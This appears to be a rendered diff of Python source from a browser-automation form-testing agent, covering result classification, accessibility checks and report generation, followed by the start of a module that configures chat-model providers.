+
elif t in ["select", "select-one", "select-multiple"]:
|
| 795 |
+
# Prefer option value; fallback to label
|
| 796 |
+
try:
|
| 797 |
+
await elem.select_option(str(value))
|
| 798 |
+
except Exception:
|
| 799 |
+
# Try by label
|
| 800 |
+
await elem.select_option(label=str(value))
|
| 801 |
+
elif t == "checkbox":
|
| 802 |
+
should_check = bool(value)
|
| 803 |
+
if should_check:
|
| 804 |
+
await elem.check(force=True)
|
| 805 |
+
else:
|
| 806 |
+
await elem.uncheck(force=True)
|
| 807 |
+
elif t == "radio":
|
| 808 |
+
await elem.check(force=True)
|
| 809 |
+
elif t == "file":
|
| 810 |
+
try:
|
| 811 |
+
await elem.set_input_files(str(value))
|
| 812 |
+
except Exception as e:
|
| 813 |
+
raise e
|
| 814 |
+
else:
|
| 815 |
+
# Fallback to typing
|
| 816 |
+
await elem.fill(str(value))
|
| 817 |
+
|
| 818 |
+
async def _clear_all_fields(self):
|
| 819 |
+
"""Clear all form fields."""
|
| 820 |
+
for field in self.form_fields:
|
| 821 |
+
try:
|
| 822 |
+
await field.element.clear()
|
| 823 |
+
except:
|
| 824 |
+
pass
|
| 825 |
+
|
| 826 |
+
async def _analyze_form_result(self) -> str:
|
| 827 |
+
"""Analyze the result after form submission."""
|
| 828 |
+
try:
|
| 829 |
+
# Check for success indicators
|
| 830 |
+
success_indicators = [
|
| 831 |
+
"success", "welcome", "dashboard", "profile", "account",
|
| 832 |
+
"logged in", "signed in", "thank you", "confirmation"
|
| 833 |
+
]
|
| 834 |
+
|
| 835 |
+
page_content = await self.page.content()
|
| 836 |
+
page_text = page_content.lower()
|
| 837 |
+
|
| 838 |
+
for indicator in success_indicators:
|
| 839 |
+
if indicator in page_text:
|
| 840 |
+
return "success"
|
| 841 |
+
|
| 842 |
+
# Check for error indicators
|
| 843 |
+
error_indicators = [
|
| 844 |
+
"error", "invalid", "incorrect", "failed", "wrong",
|
| 845 |
+
"required", "missing", "not found", "denied", "blocked"
|
| 846 |
+
]
|
| 847 |
+
|
| 848 |
+
for indicator in error_indicators:
|
| 849 |
+
if indicator in page_text:
|
| 850 |
+
return "validation_error"
|
| 851 |
+
|
| 852 |
+
# Check for security-related responses
|
| 853 |
+
security_indicators = [
|
| 854 |
+
"security", "blocked", "suspicious", "malicious",
|
| 855 |
+
"injection", "script", "xss", "sql"
|
| 856 |
+
]
|
| 857 |
+
|
| 858 |
+
for indicator in security_indicators:
|
| 859 |
+
if indicator in page_text:
|
| 860 |
+
return "security_error"
|
| 861 |
+
|
| 862 |
+
return "unknown"
|
| 863 |
+
|
| 864 |
+
except Exception as e:
|
| 865 |
+
logger.error(f"Error analyzing form result: {e}")
|
| 866 |
+
return "error"
|
| 867 |
+
|
| 868 |
+
async def run_basic_accessibility_checks(self) -> Dict[str, Any]:
|
| 869 |
+
"""Run fast, basic accessibility checks without external dependencies."""
|
| 870 |
+
issues: List[str] = []
|
| 871 |
+
try:
|
| 872 |
+
# Images without alt
|
| 873 |
+
img_without_alt = await self.page.locator("img:not([alt])").count()
|
| 874 |
+
if img_without_alt > 0:
|
| 875 |
+
issues.append(f"{img_without_alt} images missing alt text")
|
| 876 |
+
|
| 877 |
+
# Buttons without accessible name
|
| 878 |
+
btns = await self.page.locator("button").all()
|
| 879 |
+
missing_name = 0
|
| 880 |
+
for b in btns[:200]:
|
| 881 |
+
try:
|
| 882 |
+
name = await b.get_attribute("aria-label")
|
| 883 |
+
txt = await b.text_content()
|
| 884 |
+
if not (name and name.strip()) and not (txt and txt.strip()):
|
| 885 |
+
missing_name += 1
|
| 886 |
+
except Exception:
|
| 887 |
+
continue
|
| 888 |
+
if missing_name:
|
| 889 |
+
issues.append(f"{missing_name} buttons without accessible name")
|
| 890 |
+
|
| 891 |
+
# Inputs missing label
|
| 892 |
+
unlabeled = 0
|
| 893 |
+
inputs = await self.page.locator("input, textarea, select").all()
|
| 894 |
+
for i in inputs[:300]:
|
| 895 |
+
try:
|
| 896 |
+
id_attr = await i.get_attribute("id")
|
| 897 |
+
aria = await i.get_attribute("aria-label")
|
| 898 |
+
if id_attr:
|
| 899 |
+
has_label = await self.page.locator(f"label[for='{id_attr}']").count() > 0
|
| 900 |
+
else:
|
| 901 |
+
has_label = False
|
| 902 |
+
if not has_label and not (aria and aria.strip()):
|
| 903 |
+
unlabeled += 1
|
| 904 |
+
except Exception:
|
| 905 |
+
continue
|
| 906 |
+
if unlabeled:
|
| 907 |
+
issues.append(f"{unlabeled} inputs without label or aria-label")
|
| 908 |
+
|
| 909 |
+
# Tabindex anti-patterns
|
| 910 |
+
neg_tab = await self.page.locator("[tabindex='-1']").count()
|
| 911 |
+
if neg_tab:
|
| 912 |
+
issues.append(f"{neg_tab} elements with tabindex='-1'")
|
| 913 |
+
|
| 914 |
+
return {
|
| 915 |
+
"issues": issues,
|
| 916 |
+
"passed": len(issues) == 0
|
| 917 |
+
}
|
| 918 |
+
except Exception as e:
|
| 919 |
+
return {"error": str(e)}
|
| 920 |
+
|
| 921 |
+
def _evaluate_test_result(self, scenario: TestScenario, actual_result: str) -> bool:
|
| 922 |
+
"""Evaluate whether a test scenario passed or failed."""
|
| 923 |
+
if scenario.expected_result == "success":
|
| 924 |
+
return actual_result == "success"
|
| 925 |
+
elif scenario.expected_result == "validation_error":
|
| 926 |
+
return actual_result in ["validation_error", "required_error"]
|
| 927 |
+
elif scenario.expected_result == "security_error":
|
| 928 |
+
return actual_result == "security_error"
|
| 929 |
+
elif scenario.expected_result == "authentication_error":
|
| 930 |
+
return actual_result in ["validation_error", "authentication_error"]
|
| 931 |
+
else:
|
| 932 |
+
return False
|
| 933 |
+
|
| 934 |
+
async def generate_comprehensive_report(self) -> Dict[str, Any]:
|
| 935 |
+
"""Generate a comprehensive test report."""
|
| 936 |
+
logger.info("📊 Generating comprehensive test report...")
|
| 937 |
+
|
| 938 |
+
total_tests = len(self.test_results)
|
| 939 |
+
passed_tests = sum(1 for r in self.test_results if r.success)
|
| 940 |
+
failed_tests = total_tests - passed_tests
|
| 941 |
+
|
| 942 |
+
# Categorize results
|
| 943 |
+
by_scenario_type = {}
|
| 944 |
+
by_priority = {1: [], 2: [], 3: []}
|
| 945 |
+
security_tests = []
|
| 946 |
+
validation_tests = []
|
| 947 |
+
|
| 948 |
+
for result in self.test_results:
|
| 949 |
+
scenario_name = result.scenario.name
|
| 950 |
+
scenario_type = scenario_name.split(" - ")[0] if " - " in scenario_name else "Other"
|
| 951 |
+
|
| 952 |
+
if scenario_type not in by_scenario_type:
|
| 953 |
+
by_scenario_type[scenario_type] = []
|
| 954 |
+
by_scenario_type[scenario_type].append(result)
|
| 955 |
+
|
| 956 |
+
by_priority[result.scenario.priority].append(result)
|
| 957 |
+
|
| 958 |
+
if "SQL Injection" in scenario_name or "XSS" in scenario_name:
|
| 959 |
+
security_tests.append(result)
|
| 960 |
+
else:
|
| 961 |
+
validation_tests.append(result)
|
| 962 |
+
|
| 963 |
+
# Calculate metrics
|
| 964 |
+
success_rate = (passed_tests / total_tests * 100) if total_tests > 0 else 0
|
| 965 |
+
|
| 966 |
+
report = {
|
| 967 |
+
"summary": {
|
| 968 |
+
"total_tests": total_tests,
|
| 969 |
+
"passed_tests": passed_tests,
|
| 970 |
+
"failed_tests": failed_tests,
|
| 971 |
+
"success_rate": round(success_rate, 2),
|
| 972 |
+
"test_duration": "N/A", # Could be calculated if we track start/end times
|
| 973 |
+
"timestamp": datetime.now().isoformat()
|
| 974 |
+
},
|
| 975 |
+
"by_scenario_type": {
|
| 976 |
+
scenario_type: {
|
| 977 |
+
"total": len(results),
|
| 978 |
+
"passed": sum(1 for r in results if r.success),
|
| 979 |
+
"failed": sum(1 for r in results if not r.success)
|
| 980 |
+
}
|
| 981 |
+
for scenario_type, results in by_scenario_type.items()
|
| 982 |
+
},
|
| 983 |
+
"by_priority": {
|
| 984 |
+
f"Priority {priority}": {
|
| 985 |
+
"total": len(results),
|
| 986 |
+
"passed": sum(1 for r in results if r.success),
|
| 987 |
+
"failed": sum(1 for r in results if not r.success)
|
| 988 |
+
}
|
| 989 |
+
for priority, results in by_priority.items() if results
|
| 990 |
+
},
|
| 991 |
+
"security_tests": {
|
| 992 |
+
"total": len(security_tests),
|
| 993 |
+
"passed": sum(1 for r in security_tests if r.success),
|
| 994 |
+
"failed": sum(1 for r in security_tests if not r.success)
|
| 995 |
+
},
|
| 996 |
+
"validation_tests": {
|
| 997 |
+
"total": len(validation_tests),
|
| 998 |
+
"passed": sum(1 for r in validation_tests if r.success),
|
| 999 |
+
"failed": sum(1 for r in validation_tests if not r.success)
|
| 1000 |
+
},
|
| 1001 |
+
"detailed_results": [
|
| 1002 |
+
{
|
| 1003 |
+
"scenario_name": result.scenario.name,
|
| 1004 |
+
"description": result.scenario.description,
|
| 1005 |
+
"priority": result.scenario.priority,
|
| 1006 |
+
"success": result.success,
|
| 1007 |
+
"expected_result": result.scenario.expected_result,
|
| 1008 |
+
"actual_result": result.actual_result,
|
| 1009 |
+
"error_message": result.error_message,
|
| 1010 |
+
"screenshot_path": result.screenshot_path,
|
| 1011 |
+
"timestamp": result.timestamp.isoformat() if result.timestamp else None
|
| 1012 |
+
}
|
| 1013 |
+
for result in self.test_results
|
| 1014 |
+
],
|
| 1015 |
+
"recommendations": self._generate_recommendations()
|
| 1016 |
+
}
|
| 1017 |
+
|
| 1018 |
+
logger.info(f"✅ Comprehensive report generated: {passed_tests}/{total_tests} tests passed ({success_rate:.1f}%)")
|
| 1019 |
+
return report
|
| 1020 |
+
|
| 1021 |
+
def get_detailed_error_report(self) -> Dict[str, Any]:
|
| 1022 |
+
"""Get detailed error report with comprehensive analysis."""
|
| 1023 |
+
error_summary = self.error_handler.get_error_summary()
|
| 1024 |
+
|
| 1025 |
+
return {
|
| 1026 |
+
"testing_statistics": self.testing_stats,
|
| 1027 |
+
"error_analysis": error_summary,
|
| 1028 |
+
"form_field_analysis": {
|
| 1029 |
+
"total_fields": len(self.form_fields),
|
| 1030 |
+
"field_types": {
|
| 1031 |
+
field.field_type: sum(1 for f in self.form_fields if f.field_type == field.field_type)
|
| 1032 |
+
for field in self.form_fields
|
| 1033 |
+
},
|
| 1034 |
+
"required_fields": sum(1 for field in self.form_fields if field.required),
|
| 1035 |
+
"fields_with_validation": sum(1 for field in self.form_fields if field.validation_pattern)
|
| 1036 |
+
},
|
| 1037 |
+
"test_coverage": {
|
| 1038 |
+
"scenarios_executed": len(self.test_results),
|
| 1039 |
+
"success_rate": f"{(self.testing_stats['passed_tests'] / max(self.testing_stats['total_tests'], 1) * 100):.2f}%",
|
| 1040 |
+
"error_rate": f"{(self.testing_stats['error_tests'] / max(self.testing_stats['total_tests'], 1) * 100):.2f}%"
|
| 1041 |
+
},
|
| 1042 |
+
"recommendations": self._generate_improvement_recommendations()
|
| 1043 |
+
}
|
| 1044 |
+
|
| 1045 |
+
def _generate_improvement_recommendations(self) -> List[str]:
|
| 1046 |
+
"""Generate improvement recommendations based on test results."""
|
| 1047 |
+
recommendations = []
|
| 1048 |
+
|
| 1049 |
+
if self.testing_stats["error_tests"] > 0:
|
| 1050 |
+
recommendations.append("🔧 Consider improving error handling and field validation")
|
| 1051 |
+
|
| 1052 |
+
if self.testing_stats["passed_tests"] < self.testing_stats["total_tests"] * 0.8:
|
| 1053 |
+
recommendations.append("📈 Review form validation logic and user experience")
|
| 1054 |
+
|
| 1055 |
+
if len(self.form_fields) == 0:
|
| 1056 |
+
recommendations.append("🔍 No form fields detected - verify page content and selectors")
|
| 1057 |
+
|
| 1058 |
+
if self.testing_stats["error_tests"] > self.testing_stats["total_tests"] * 0.3:
|
| 1059 |
+
recommendations.append("⚠️ High error rate detected - check page stability and element selectors")
|
| 1060 |
+
|
| 1061 |
+
return recommendations
|
| 1062 |
+
|
| 1063 |
+
def _generate_recommendations(self) -> List[str]:
|
| 1064 |
+
"""Generate recommendations based on test results."""
|
| 1065 |
+
recommendations = []
|
| 1066 |
+
|
| 1067 |
+
failed_tests = [r for r in self.test_results if not r.success]
|
| 1068 |
+
|
| 1069 |
+
if not failed_tests:
|
| 1070 |
+
recommendations.append("🎉 All tests passed! The form validation is working correctly.")
|
| 1071 |
+
return recommendations
|
| 1072 |
+
|
| 1073 |
+
# Analyze failure patterns
|
| 1074 |
+
validation_failures = [r for r in failed_tests if "validation" in r.scenario.name.lower()]
|
| 1075 |
+
security_failures = [r for r in failed_tests if any(x in r.scenario.name.lower() for x in ["sql", "xss", "injection"])]
|
| 1076 |
+
required_failures = [r for r in failed_tests if "empty" in r.scenario.name.lower()]
|
| 1077 |
+
|
| 1078 |
+
if validation_failures:
|
| 1079 |
+
recommendations.append("⚠️ Some validation tests failed. Review form validation rules and error messages.")
|
| 1080 |
+
|
| 1081 |
+
if security_failures:
|
| 1082 |
+
recommendations.append("🔒 Security tests failed. Implement proper input sanitization and validation.")
|
| 1083 |
+
|
| 1084 |
+
if required_failures:
|
| 1085 |
+
recommendations.append("📝 Required field validation needs improvement. Ensure proper error messages for empty required fields.")
|
| 1086 |
+
|
| 1087 |
+
# Specific recommendations based on field types
|
| 1088 |
+
email_failures = [r for r in failed_tests if "email" in r.scenario.name.lower()]
|
| 1089 |
+
if email_failures:
|
| 1090 |
+
recommendations.append("📧 Email validation needs improvement. Implement proper email format validation.")
|
| 1091 |
+
|
| 1092 |
+
password_failures = [r for r in failed_tests if "password" in r.scenario.name.lower()]
|
| 1093 |
+
if password_failures:
|
| 1094 |
+
recommendations.append("🔐 Password validation needs improvement. Implement proper password strength requirements.")
|
| 1095 |
+
|
| 1096 |
+
return recommendations
|
src/utils/llm_provider.py
ADDED
|
@@ -0,0 +1,366 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - LLM Provider
|
| 3 |
+
========================================================
|
| 4 |
+
|
| 5 |
+
LLM provider utilities and configurations for the Fagun Browser Automation Testing Agent.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
from openai import OpenAI
|
| 13 |
+
import pdb
|
| 14 |
+
from langchain_openai import ChatOpenAI
|
| 15 |
+
from langchain_core.globals import get_llm_cache
|
| 16 |
+
from langchain_core.language_models.base import (
|
| 17 |
+
BaseLanguageModel,
|
| 18 |
+
LangSmithParams,
|
| 19 |
+
LanguageModelInput,
|
| 20 |
+
)
|
| 21 |
+
import os
|
| 22 |
+
from langchain_core.load import dumpd, dumps
|
| 23 |
+
from langchain_core.messages import (
|
| 24 |
+
AIMessage,
|
| 25 |
+
SystemMessage,
|
| 26 |
+
AnyMessage,
|
| 27 |
+
BaseMessage,
|
| 28 |
+
BaseMessageChunk,
|
| 29 |
+
HumanMessage,
|
| 30 |
+
convert_to_messages,
|
| 31 |
+
message_chunk_to_message,
|
| 32 |
+
)
|
| 33 |
+
from langchain_core.outputs import (
|
| 34 |
+
ChatGeneration,
|
| 35 |
+
ChatGenerationChunk,
|
| 36 |
+
ChatResult,
|
| 37 |
+
LLMResult,
|
| 38 |
+
RunInfo,
|
| 39 |
+
)
|
| 40 |
+
from langchain_ollama import ChatOllama
|
| 41 |
+
from langchain_core.output_parsers.base import OutputParserLike
|
| 42 |
+
from langchain_core.runnables import Runnable, RunnableConfig
|
| 43 |
+
from langchain_core.tools import BaseTool
|
| 44 |
+
|
| 45 |
+
from typing import (
|
| 46 |
+
TYPE_CHECKING,
|
| 47 |
+
Any,
|
| 48 |
+
Callable,
|
| 49 |
+
Literal,
|
| 50 |
+
Optional,
|
| 51 |
+
Union,
|
| 52 |
+
cast, List,
|
| 53 |
+
)
|
| 54 |
+
from langchain_anthropic import ChatAnthropic
|
| 55 |
+
from langchain_mistralai import ChatMistralAI
|
| 56 |
+
from langchain_google_genai import ChatGoogleGenerativeAI
|
| 57 |
+
from langchain_ollama import ChatOllama
|
| 58 |
+
from langchain_openai import AzureChatOpenAI, ChatOpenAI
|
| 59 |
+
from langchain_ibm import ChatWatsonx
|
| 60 |
+
from langchain_aws import ChatBedrock
|
| 61 |
+
from pydantic import SecretStr
|
| 62 |
+
|
| 63 |
+
from src.utils import config
|
| 64 |
+
|
| 65 |
+
|
| 66 |
+
class DeepSeekR1ChatOpenAI(ChatOpenAI):
|
| 67 |
+
|
| 68 |
+
def __init__(self, *args: Any, **kwargs: Any) -> None:
|
| 69 |
+
super().__init__(*args, **kwargs)
|
| 70 |
+
self.client = OpenAI(
|
| 71 |
+
base_url=kwargs.get("base_url"),
|
| 72 |
+
api_key=kwargs.get("api_key")
|
| 73 |
+
)
|
| 74 |
+
|
| 75 |
+
async def ainvoke(
|
| 76 |
+
self,
|
| 77 |
+
input: LanguageModelInput,
|
| 78 |
+
config: Optional[RunnableConfig] = None,
|
| 79 |
+
*,
|
| 80 |
+
stop: Optional[list[str]] = None,
|
| 81 |
+
**kwargs: Any,
|
| 82 |
+
) -> AIMessage:
|
| 83 |
+
message_history = []
|
| 84 |
+
for input_ in input:
|
| 85 |
+
if isinstance(input_, SystemMessage):
|
| 86 |
+
message_history.append({"role": "system", "content": input_.content})
|
| 87 |
+
elif isinstance(input_, AIMessage):
|
| 88 |
+
message_history.append({"role": "assistant", "content": input_.content})
|
| 89 |
+
else:
|
| 90 |
+
message_history.append({"role": "user", "content": input_.content})
|
| 91 |
+
|
| 92 |
+
response = self.client.chat.completions.create(
|
| 93 |
+
model=self.model_name,
|
| 94 |
+
messages=message_history
|
| 95 |
+
)
|
| 96 |
+
|
| 97 |
+
reasoning_content = response.choices[0].message.reasoning_content
|
| 98 |
+
content = response.choices[0].message.content
|
| 99 |
+
return AIMessage(content=content, reasoning_content=reasoning_content)
|
| 100 |
+
|
| 101 |
+
def invoke(
|
| 102 |
+
self,
|
| 103 |
+
input: LanguageModelInput,
|
| 104 |
+
config: Optional[RunnableConfig] = None,
|
| 105 |
+
*,
|
| 106 |
+
stop: Optional[list[str]] = None,
|
| 107 |
+
**kwargs: Any,
|
| 108 |
+
) -> AIMessage:
|
| 109 |
+
message_history = []
|
| 110 |
+
for input_ in input:
|
| 111 |
+
if isinstance(input_, SystemMessage):
|
| 112 |
+
message_history.append({"role": "system", "content": input_.content})
|
| 113 |
+
elif isinstance(input_, AIMessage):
|
| 114 |
+
message_history.append({"role": "assistant", "content": input_.content})
|
| 115 |
+
else:
|
| 116 |
+
message_history.append({"role": "user", "content": input_.content})
|
| 117 |
+
|
| 118 |
+
response = self.client.chat.completions.create(
|
| 119 |
+
model=self.model_name,
|
| 120 |
+
messages=message_history
|
| 121 |
+
)
|
| 122 |
+
|
| 123 |
+
reasoning_content = response.choices[0].message.reasoning_content
|
| 124 |
+
content = response.choices[0].message.content
|
| 125 |
+
return AIMessage(content=content, reasoning_content=reasoning_content)
|
| 126 |
+
|
| 127 |
+
|
| 128 |
+
class DeepSeekR1ChatOllama(ChatOllama):
|
| 129 |
+
|
| 130 |
+
async def ainvoke(
|
| 131 |
+
self,
|
| 132 |
+
input: LanguageModelInput,
|
| 133 |
+
config: Optional[RunnableConfig] = None,
|
| 134 |
+
*,
|
| 135 |
+
stop: Optional[list[str]] = None,
|
| 136 |
+
**kwargs: Any,
|
| 137 |
+
) -> AIMessage:
|
| 138 |
+
org_ai_message = await super().ainvoke(input=input)
|
| 139 |
+
org_content = org_ai_message.content
|
| 140 |
+
reasoning_content = org_content.split("</think>")[0].replace("<think>", "")
|
| 141 |
+
content = org_content.split("</think>")[1]
|
| 142 |
+
if "**JSON Response:**" in content:
|
| 143 |
+
content = content.split("**JSON Response:**")[-1]
|
| 144 |
+
return AIMessage(content=content, reasoning_content=reasoning_content)
|
| 145 |
+
|
| 146 |
+
def invoke(
|
| 147 |
+
self,
|
| 148 |
+
input: LanguageModelInput,
|
| 149 |
+
config: Optional[RunnableConfig] = None,
|
| 150 |
+
*,
|
| 151 |
+
stop: Optional[list[str]] = None,
|
| 152 |
+
**kwargs: Any,
|
| 153 |
+
) -> AIMessage:
|
| 154 |
+
org_ai_message = super().invoke(input=input)
|
| 155 |
+
org_content = org_ai_message.content
|
| 156 |
+
reasoning_content = org_content.split("</think>")[0].replace("<think>", "")
|
| 157 |
+
content = org_content.split("</think>")[1]
|
| 158 |
+
if "**JSON Response:**" in content:
|
| 159 |
+
content = content.split("**JSON Response:**")[-1]
|
| 160 |
+
return AIMessage(content=content, reasoning_content=reasoning_content)
|
| 161 |
+
|
| 162 |
+
|
| 163 |
+
def get_llm_model(provider: str, **kwargs):
|
| 164 |
+
"""
|
| 165 |
+
Get LLM model
|
| 166 |
+
:param provider: LLM provider
|
| 167 |
+
:param kwargs:
|
| 168 |
+
:return:
|
| 169 |
+
"""
|
| 170 |
+
if provider not in ["ollama", "bedrock"]:
|
| 171 |
+
env_var = f"{provider.upper()}_API_KEY"
|
| 172 |
+
api_key = kwargs.get("api_key", "") or os.getenv(env_var, "")
|
| 173 |
+
if not api_key:
|
| 174 |
+
provider_display = config.PROVIDER_DISPLAY_NAMES.get(provider, provider.upper())
|
| 175 |
+
error_msg = f"💥 {provider_display} API key not found! 🔑 Please set the `{env_var}` environment variable or provide it in the UI."
|
| 176 |
+
raise ValueError(error_msg)
|
| 177 |
+
kwargs["api_key"] = api_key
|
| 178 |
+
|
| 179 |
+
if provider == "anthropic":
|
| 180 |
+
if not kwargs.get("base_url", ""):
|
| 181 |
+
base_url = "https://api.anthropic.com"
|
| 182 |
+
else:
|
| 183 |
+
base_url = kwargs.get("base_url")
|
| 184 |
+
|
| 185 |
+
return ChatAnthropic(
|
| 186 |
+
model=kwargs.get("model_name", "claude-3-5-sonnet-20241022"),
|
| 187 |
+
temperature=kwargs.get("temperature", 0.0),
|
| 188 |
+
base_url=base_url,
|
| 189 |
+
api_key=api_key,
|
| 190 |
+
)
|
| 191 |
+
elif provider == 'mistral':
|
| 192 |
+
if not kwargs.get("base_url", ""):
|
| 193 |
+
base_url = os.getenv("MISTRAL_ENDPOINT", "https://api.mistral.ai/v1")
|
| 194 |
+
else:
|
| 195 |
+
base_url = kwargs.get("base_url")
|
| 196 |
+
if not kwargs.get("api_key", ""):
|
| 197 |
+
api_key = os.getenv("MISTRAL_API_KEY", "")
|
| 198 |
+
else:
|
| 199 |
+
api_key = kwargs.get("api_key")
|
| 200 |
+
|
| 201 |
+
return ChatMistralAI(
|
| 202 |
+
model=kwargs.get("model_name", "mistral-large-latest"),
|
| 203 |
+
temperature=kwargs.get("temperature", 0.0),
|
| 204 |
+
base_url=base_url,
|
| 205 |
+
api_key=api_key,
|
| 206 |
+
)
|
| 207 |
+
elif provider == "openai":
|
| 208 |
+
if not kwargs.get("base_url", ""):
|
| 209 |
+
base_url = os.getenv("OPENAI_ENDPOINT", "https://api.openai.com/v1")
|
| 210 |
+
else:
|
| 211 |
+
base_url = kwargs.get("base_url")
|
| 212 |
+
|
| 213 |
+
return ChatOpenAI(
|
| 214 |
+
model=kwargs.get("model_name", "gpt-4o"),
|
| 215 |
+
temperature=kwargs.get("temperature", 0.0),
|
| 216 |
+
base_url=base_url,
|
| 217 |
+
api_key=api_key,
|
| 218 |
+
)
|
| 219 |
+
elif provider == "grok":
|
| 220 |
+
if not kwargs.get("base_url", ""):
|
| 221 |
+
base_url = os.getenv("GROK_ENDPOINT", "https://api.x.ai/v1")
|
| 222 |
+
else:
|
| 223 |
+
base_url = kwargs.get("base_url")
|
| 224 |
+
|
| 225 |
+
return ChatOpenAI(
|
| 226 |
+
model=kwargs.get("model_name", "grok-3"),
|
| 227 |
+
temperature=kwargs.get("temperature", 0.0),
|
| 228 |
+
base_url=base_url,
|
| 229 |
+
api_key=api_key,
|
| 230 |
+
)
|
| 231 |
+
elif provider == "deepseek":
|
| 232 |
+
if not kwargs.get("base_url", ""):
|
| 233 |
+
base_url = os.getenv("DEEPSEEK_ENDPOINT", "")
|
| 234 |
+
else:
|
| 235 |
+
base_url = kwargs.get("base_url")
|
| 236 |
+
|
| 237 |
+
if kwargs.get("model_name", "deepseek-chat") == "deepseek-reasoner":
|
| 238 |
+
return DeepSeekR1ChatOpenAI(
|
| 239 |
+
model=kwargs.get("model_name", "deepseek-reasoner"),
|
| 240 |
+
temperature=kwargs.get("temperature", 0.0),
|
| 241 |
+
base_url=base_url,
|
| 242 |
+
api_key=api_key,
|
| 243 |
+
)
|
| 244 |
+
else:
|
| 245 |
+
return ChatOpenAI(
|
| 246 |
+
model=kwargs.get("model_name", "deepseek-chat"),
|
| 247 |
+
temperature=kwargs.get("temperature", 0.0),
|
| 248 |
+
base_url=base_url,
|
| 249 |
+
api_key=api_key,
|
| 250 |
+
)
|
| 251 |
+
elif provider == "google":
|
| 252 |
+
return ChatGoogleGenerativeAI(
|
| 253 |
+
model=kwargs.get("model_name", "gemini-2.0-flash-exp"),
|
| 254 |
+
temperature=kwargs.get("temperature", 0.0),
|
| 255 |
+
api_key=api_key,
|
| 256 |
+
)
|
| 257 |
+
elif provider == "ollama":
|
| 258 |
+
if not kwargs.get("base_url", ""):
|
| 259 |
+
base_url = os.getenv("OLLAMA_ENDPOINT", "http://localhost:11434")
|
| 260 |
+
else:
|
| 261 |
+
base_url = kwargs.get("base_url")
|
| 262 |
+
|
| 263 |
+
if "deepseek-r1" in kwargs.get("model_name", "qwen2.5:7b"):
|
| 264 |
+
